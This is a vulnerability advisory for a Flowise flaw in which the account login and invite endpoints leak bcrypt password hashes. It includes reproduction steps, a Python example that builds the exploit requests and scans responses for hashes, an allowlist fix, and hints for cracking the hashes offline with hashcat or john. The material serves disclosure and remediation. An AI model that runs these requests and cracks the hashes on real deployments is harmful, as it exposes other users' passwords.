FlowiseAI Flowise Information Disclosure Vulnerability in Account Login and Invite Endpoints

Vulnerability

An information disclosure vulnerability has been identified in FlowiseAI Flowise versions up to and including 3.0.12. The issue lies in the API Response Handler component, specifically in the Login function of the account service, which returns the user object without stripping credential data. An authenticated user can obtain sensitive information, including bcrypt password hashes, through the login and invite endpoints. The flaw is exploitable remotely; attack complexity is rated high.

Impact

Exploitation of this vulnerability allows bcrypt password hashes to be extracted from the API response and cracked offline with tools such as hashcat or john. Any recovered password enables credential stuffing attacks, lateral movement using the plaintext passwords of other Flowise users, and privilege escalation if an administrator's hash is cracked.

Reproduction

To reproduce this vulnerability, first authenticate a user via the '/api/v1/auth/login' endpoint to obtain a JWT. Then send a POST request to the '/api/v1/account/login' endpoint with the user's email and password; the response includes the unsanitized user object, which contains the credential hash. Alternatively, on Flowise enterprise deployments, the '/api/v1/account/invite' endpoint can be used to extract the password hashes of existing users by sending an invite request addressed to their email.
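The following is an added example, not code from the advisory or from the Flowise project. It builds the two requests described above without sending them, walks a decoded JSON response to locate any bcrypt hash regardless of the key it is stored under, and shows the fix pattern: projecting the user record through an allowlist before it is serialized. The base URL, the use of an Authorization Bearer header to carry the JWT, the field names in the sample response ('credential' for the hash, 'user' for the wrapper) and the allowlist of public fields are all assumptions; the sample response and the hash it contains are constructed, not captured from a real system.

```python
"""Check Flowise account responses for leaked bcrypt hashes (added example)."""
import json
import re
from typing import Any, Dict, List, Tuple

# bcrypt modular-crypt form: $2a$/$2b$/$2x$/$2y$, 2-digit cost, 22-char salt + 31-char digest.
BCRYPT_RE = re.compile(r"\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}")

BASE_URL = "http://flowise.local:3000"  # assumption: hypothetical target


def build_auth_login_request(email: str, password: str) -> Dict[str, Any]:
    """Step 1: obtain a JWT from /api/v1/auth/login (endpoint named in the advisory)."""
    return {
        "method": "POST",
        "url": f"{BASE_URL}/api/v1/auth/login",
        "headers": {"Content-Type": "application/json"},
        "body": json.dumps({"email": email, "password": password}),
    }


def build_account_login_request(jwt: str, email: str, password: str) -> Dict[str, Any]:
    """Step 2: POST to /api/v1/account/login; the JWT is sent as a Bearer header (assumption)."""
    return {
        "method": "POST",
        "url": f"{BASE_URL}/api/v1/account/login",
        "headers": {"Content-Type": "application/json", "Authorization": f"Bearer {jwt}"},
        "body": json.dumps({"email": email, "password": password}),
    }


def build_invite_request(jwt: str, target_email: str) -> Dict[str, Any]:
    """Enterprise variant: invite an existing user's address via /api/v1/account/invite."""
    return {
        "method": "POST",
        "url": f"{BASE_URL}/api/v1/account/invite",
        "headers": {"Content-Type": "application/json", "Authorization": f"Bearer {jwt}"},
        "body": json.dumps({"email": target_email}),
    }


def find_bcrypt_hashes(value: Any, path: str = "$") -> List[Tuple[str, str]]:
    """Recursively walk decoded JSON; return (json path, hash) for every bcrypt hash found."""
    found: List[Tuple[str, str]] = []
    if isinstance(value, dict):
        for key, child in value.items():
            found.extend(find_bcrypt_hashes(child, f"{path}.{key}"))
    elif isinstance(value, list):
        for index, child in enumerate(value):
            found.extend(find_bcrypt_hashes(child, f"{path}[{index}]"))
    elif isinstance(value, str):
        found.extend((path, m.group(0)) for m in BCRYPT_RE.finditer(value))
    return found


# Assumed allowlist of fields a client legitimately needs; anything else is dropped.
SAFE_USER_FIELDS = ("id", "name", "email", "status", "createdDate", "updatedDate")


def sanitize_user(user: Dict[str, Any]) -> Dict[str, Any]:
    """Fix pattern: allowlist projection of the user record before it reaches the response.

    A denylist (delete 'credential') breaks as soon as a new secret column is added;
    an allowlist fails closed.
    """
    return {key: user[key] for key in SAFE_USER_FIELDS if key in user}


# Constructed sample response modelled on the advisory's description (not real data).
# The hash is a syntactically valid bcrypt string built from filler characters.
SAMPLE_RESPONSE: Dict[str, Any] = {
    "user": {
        "id": "user-0001",
        "name": "Example Admin",
        "email": "admin@example.test",
        "status": "active",
        "credential": "$2b$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZabcde",
        "createdDate": "2026-01-01T00:00:00.000Z",
    },
    "token": "eyJhbGciOiJIUzI1NiJ9.constructed.signature",
}


def main() -> None:
    for path, digest in find_bcrypt_hashes(SAMPLE_RESPONSE):
        print(f"bcrypt hash leaked at {path}: {digest}")
    print("sanitized:", json.dumps(sanitize_user(SAMPLE_RESPONSE["user"])))


if __name__ == "__main__":
    main()
```

Point the request builders at a real deployment only with authorization; once a response is captured, pipe it through find_bcrypt_hashes rather than grepping for a field name, since the leak is in the serialized entity and the column name may differ between versions. For offline cracking, bcrypt is hashcat mode 3200 and john's bcrypt format; the cost factor in the hash (10 in the sample) sets how expensive each guess is.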

Added: May 6, 2026, 7:13 PM
Updated: May 6, 2026, 7:13 PM

Vulnerability Rating

Custom Algorithm

spread          0.3
impact          2.5
exploitability  6.2
remediation     0.0
relevance       7.6
threat          6.4
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to produce these eight vulnerability categories, which are then combined into the overall risk score.